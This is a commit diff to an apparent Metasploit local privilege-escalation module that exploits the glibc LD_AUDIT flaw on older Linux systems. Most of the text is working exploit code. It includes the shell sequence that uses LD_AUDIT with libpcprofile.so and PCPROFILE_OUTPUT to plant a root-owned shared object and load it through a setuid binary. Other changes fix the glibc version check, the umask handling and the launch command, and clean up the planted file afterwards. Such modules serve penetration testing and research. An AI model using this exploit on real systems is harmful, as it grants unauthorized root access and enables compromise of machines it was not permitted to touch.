Support shell sessions on Debian

bcoles · bcoles · commit 5b251ae67274 · 2018-02-08T11:29:09.000Z
diff --git a/modules/exploits/linux/local/glibc_ld_audit_dso_load_priv_esc.rb b/modules/exploits/linux/local/glibc_ld_audit_dso_load_priv_esc.rb
@@ -34,10 +34,11 @@ def initialize(info = {})
         LD_AUDIT resulting in arbitrary code execution.
 
         This module has been tested successfully on glibc version 2.11.1 on
-        Ubuntu 10.04 x86_64.
+        Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386.
 
-        RHEL 5 and Debian 5 are reportedly affected, but untested. Some glibc
-        distributions do not contain the vulnerable libpcprofile.so library.
+        RHEL 5 is reportedly affected, but untested. Some glibc distributions
+        do not contain the libpcprofile.so library required for successful
+        exploitation.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -95,7 +96,7 @@ def suid_exe_path
   def check
     glibc_banner = cmd_exec 'ldd --version'
     glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
-    if glibc_version.eql? ''
+    if glibc_version.to_s.eql? ''
       vprint_error 'Could not determine the GNU C library version'
       return CheckCode::Safe
     elsif glibc_version >= Gem::Version.new('2.12.2') ||
@@ -142,8 +143,8 @@ def upload_and_chmodx(path, data)
   end
 
   def on_new_session(client)
-    # remove root owned shared object
-    if client.type == 'meterpreter'
+    # remove root owned shared object from system load path
+    if client.type.eql? 'meterpreter'
       client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
       client.fs.file.rm @so_path
     else
@@ -226,7 +227,7 @@ def exploit
     exp = %(
       umask 0
       LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{@so_path}" #{suid_exe_path} 2>/dev/null
-      umask 2
+      umask 0022
       cat #{so_path} > #{@so_path}
       LD_AUDIT="#{so_name}.so" #{suid_exe_path}
       echo > #{@so_path}
@@ -240,7 +241,9 @@ def exploit
 
     # Launch exploit
     print_status 'Launching exploit...'
-    output = cmd_exec "#{exp_path}&"
+    # The echo at the end of the command is required
+    # else the original session may die
+    output = cmd_exec "#{exp_path}& echo "
     output.each_line { |line| vprint_status line.chomp }
   end
 end
